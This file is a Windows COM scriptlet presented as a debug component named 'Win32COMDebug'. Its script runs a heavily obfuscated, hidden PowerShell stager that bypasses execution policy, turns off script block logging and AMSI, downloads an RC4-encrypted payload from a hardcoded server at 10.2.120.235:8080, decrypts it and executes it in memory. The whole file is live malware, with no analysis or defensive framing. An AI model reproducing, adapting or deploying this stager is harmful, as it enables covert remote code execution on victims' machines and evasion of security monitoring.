<?XML version="1.0"?>
<scriptlet>
<registration
description="Win32COMDebug"
progid="Win32COMDebug"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
 >
 <script language="JScript">
      <![CDATA[
           var r = new ActiveXObject("WScript.Shell").Run('Cmd/C"seT  lwr=   set-iTem  (\'vaRiAb\'+\'le\'+\':K4J\'+\'7\') (  [tyPe]("{1}{8}{7}{2}{6}{3}{5}{4}{0}{9}"-f\'E\',\'COLLECTiOns.G\',\'c.Di\',\'g,\',\'teM.oBJ\',\'syS\',\'CTiOnAry[STrIn\',\'nErI\',\'e\',\'ct\')  );  seT-item ("VarIA"+"BL"+"E:9N6") ([TYpe]("{2}{3}{0}{1}"-f \'IpTBLoC\',\'k\',\'s\',\'cr\')) ;  $2C08p  =  [type]("{1}{0}" -F \'F\',\'Re\')  ; $7h01l =[TyPe]("{3}{5}{4}{0}{1}{2}"-f \'.SERvicEpo\',\'in\',\'tMAnaGeR\',\'SY\',\'TeM.Net\',\'s\') ;  seT  ("tW"+"0") ([TYPe]("{2}{0}{1}{4}{3}" -f \'EM.nE\',\'t.wEBR\',\'SYSt\',\'st\',\'EqUE\') ) ;   sEt-itEM  ("{2}{3}{1}{0}"-f\'JCL\',\':\',\'vAri\',\'aBLE\')  ( [TyPE]("{1}{2}{0}{3}{5}{6}{4}" -F\'TeM.net.cR\',\'Sy\',\'S\',\'E\',\'e\',\'DEnTialc\',\'ACh\'))  ;SEt-VaRIaBLe  ("{1}{0}{2}"-f\'Q\',\'s3C\',\'Hu\') (  [tYpe]("{5}{1}{4}{2}{0}{3}"-F\'nCo\',\'Em.t\',\'.e\',\'diNg\',\'Ext\',\'SYsT\')  ) ; IF(${PsVeRsi`oN`TAB`LE}."PSv`E`RSIOn"."MAJ`OR" -ge 3){${g`Pf}=  (gET-VariABLe  ("{1}{0}"-f\'8p\',\'2C0\')  ).vaLUE."a`sSE`mBLY".("{0}{2}{1}"-f\'GetT\',\'E\',\'yp\').Invoke(("{5}{6}{2}{3}{0}{4}{1}"-f \'ement.Aut\',\'ls\',\'Ma\',\'nag\',\'omation.Uti\',\'Sys\',\'tem.\'))."GeTFIE`ld"(("{1}{0}{3}{2}{4}"-f\'ch\',\'ca\',\'oup\',\'edGr\',\'PolicySettings\'),\'N\'+("{3}{1}{4}{2}{0}" -f\'atic\',\'P\',\'ic,St\',\'on\',\'ubl\'));If(${G`Pf}){${G`pC}=${G`PF}.("{2}{1}{0}"-f \'e\',\'U\',\'GetVal\').Invoke(${N`ULl});If(${G`Pc}[("{0}{2}{1}" -f \'Scri\',\'tB\',\'p\')+("{3}{2}{1}{0}" -f\'ng\',\'gi\',\'g\',\'lockLo\')]){${G`pc}[("{0}{1}" -f \'Sc\',\'riptB\')+("{3}{2}{1}{0}" -f \'ng\',\'oggi\',\'L\',\'lock\')][("{3}{0}{2}{1}"-f\'S\',\'iptB\',\'cr\',\'Enable\')+("{1}{3}{2}{0}" -f \'ing\',\'l\',\'ogg\',\'ockL\')]=0;${G`Pc}[("{0}{1}" -f \'Scr\',\'iptB\')+("{0}{2}{1}" -f\'lo\',\'ging\',\'ckLog\')][("{2}{9}{1}{7}{8}{3}{4}{0}{6}{5}" -f\'n\',\'r\',\'E\',\'BlockInvocat\',\'io\',\'ng\',\'Loggi\',\'i\',\'pt\',\'nableSc\')]=0}${v`AL}= (  GeT-itEm  (\'VARiaB\'+\'LE\'+\':K4J\'+\'7\') ).vaLUE::("{0}{1}" -f \'n\',\'Ew\').Invoke();${v`AL}.("{0}{1}" -f\'A\',\'Dd\').Invoke(("{1}{2}{0}"-f \'iptB\',\'Enab\',\'leScr\')+("{0}{1}{2}{3}"-f \'l\',\'oc\',\'k\',\'Logging\'),0);${v`AL}.("{1}{0}"-f \'d\',\'AD\').Invoke(("{2}{5}{6}{4}{3}{0}{1}"-f \'BlockInvocationLoggin\',\'g\',\'Ena\',\'pt\',\'i\',\'bl\',\'eScr\'),0);${G`PC}[((("{8}{3}{14}{7}{12}{5}{11}{13}{2}{4}{9}{10}{6}{1}{0}" -f \'}ScriptB\',\'{0\',\'os\',\'KEY_\',\'oft{0}Windo\',\'are{0}Poli\',\'{0}PowerShell\',\'CHINE{0}Soft\',\'H\',\'w\',\'s\',\'cies{0}\',\'w\',\'Micr\',\'LOCAL_MA\'))  -F [CHaR]92)+("{2}{0}{1}" -f \'n\',\'g\',\'lockLoggi\')]=${V`AL}}ElSe{  (  GI  ("VaRiA"+"BL"+"e:9n6")  ).valUe."GETFie`ld"(("{2}{0}{1}"-f\'na\',\'tures\',\'sig\'),\'N\'+("{3}{2}{1}{0}"-f\'ic\',\',Stat\',\'ublic\',\'onP\'))."s`eTv`ALuE"(${NU`LL},(^&("{1}{2}{0}" -f\'t\',\'NEw-O\',\'BjEc\') ("{3}{6}{2}{4}{1}{7}{5}{0}" -f \']\',\'[Str\',\'ons.GENeriC.\',\'COLL\',\'HASHSet\',\'G\',\'eCti\',\'in\')))} $2c08p."AS`sem`BLY".("{0}{1}" -f \'GETT\',\'YpE\').Invoke(("{1}{3}{7}{6}{0}{4}{5}{2}"-f\'ation.A\',\'Sy\',\'s\',\'stem\',\'msi\',\'Util\',\'agement.Autom\',\'.Man\'))^|^&(\'?\'){${_}}^|.(\'%\'){${_}.("{0}{1}"-f \'GeTFIeL\',\'D\').Invoke(("{3}{2}{1}{0}"-f \'led\',\'i\',\'iInitFa\',\'ams\'),("{2}{3}{1}{0}"-f\'c\',\'Stati\',\'N\',\'onPublic,\')).("{0}{1}" -f \'SETVAl\',\'Ue\').Invoke(${nU`ll},${Tr`Ue})};};  $7H01l::"eXpECt100`contI`NUe"=0;${w`C}=^&("{1}{0}{3}{2}" -f \'-\',\'NEw\',\'T\',\'OBJeC\') ("{3}{2}{1}{0}{4}" -f \'.NeT.WEBClIe\',\'eM\',\'yST\',\'S\',\'nT\');${u}=(("{11}{19}{10}{2}{4}{17}{5}{9}{0}{14}{16}{7}{8}{1}{15}{12}{3}{18}{6}{13}"-f \' 6.1; W\',\'iden\',\'lla/5\',\') \',\'.0 \',\'in\',\'e \',\'4;\',\' Tr\',\'dows NT\',\'i\',\'M\',\'.0\',\'Gecko\',\'O\',\'t/7.0; rv:11\',\'W6\',\'(W\',\'lik\',\'oz\'));${WC}."h`Ea`ders".("{0}{1}"-f \'Ad\',\'D\').Invoke(("{1}{0}{2}"-f\'gen\',\'User-A\',\'t\'),${u});${W`c}."pRo`xy"= ( vARIabLE ("tW"+"0") -vALUeonLY )::"dEfAul`TW`e`B`PrOxy";${WC}."pr`OXy"."C`ReDEnT`IAlS" =   (item  ("{1}{2}{0}" -f\'L\',\'vAri\',\'aBle:jc\') ).VALUE::"def`Aul`TNEtwoR`kC`Rede`NT`ialS";${Sc`R`ip`T:P`ROXy} = ${wC}."p`ROxy";${k}= $s3cqhu::"asc`Ii".("{1}{0}{2}" -f \'tBy\',\'GE\',\'tES\').Invoke(\'Zz^|YyBX91S;E!6JDfb7(in^<qPwl}CFgR\');${r}={${D},${k}=${a`RGS};${s}=0..255;0..255^|.(\'%\'){${J}=(${J}+${S}[${_}]+${k}[${_}%${k}."COU`Nt"])%256;${s}[${_}],${s}[${J}]=${s}[${J}],${s}[${_}]};${d}^|.(\'%\'){${I}=(${I}+1)%256;${H}=(${h}+${S}[${i}])%256;${S}[${i}],${S}[${H}]=${S}[${H}],${s}[${i}];${_}-bxoR${S}[(${S}[${I}]+${S}[${H}])%256]}};${s`ER}=("{4}{3}{0}{2}{1}" -f \'.12\',\'0\',\'0.235:808\',\'10.2\',\'http://\');${t}=("{2}{1}{0}{3}" -f\'s\',\'proce\',\'/login/\',\'s.php\');${W`C}."hEA`de`RS".("{0}{1}"-f\'AD\',\'D\').Invoke(("{0}{1}" -f \'Cooki\',\'e\'),("{2}{8}{7}{4}{5}{6}{3}{0}{1}"-f\'N2QakIQSU\',\'=\',\'s\',\'dy\',\'A\',\'ROLyyg8\',\'Z\',\'oOPWeo\',\'ession=m\'));${dA`Ta}=${W`C}.("{3}{1}{2}{0}" -f\'tA\',\'O\',\'ADDA\',\'DOwNL\').Invoke(${s`er}+${T});${I`V}=${DA`TA}[0..3];${Da`Ta}=${DA`Ta}[4..${da`TA}."Le`NGtH"];-JoIn[ChaR[]](^& ${R} ${da`Ta} (${Iv}+${K}))^|^&("{1}{0}"-f \'X\',\'IE\') &&sEt  auIRj=ECHO  IEX (gEt-cHiLdiTem enV:lwR).vAluE^|  powErShELL  -windoWS  HiDDeN -NoprOfi -nOnINT -NoEx  -ExECUtIONpO  BypaSS     - &&Cmd/C %auirj%"');
      ]]>
 </script>
</registration>
<public>
    <method name="Exec"></method>
</public>
</scriptlet>
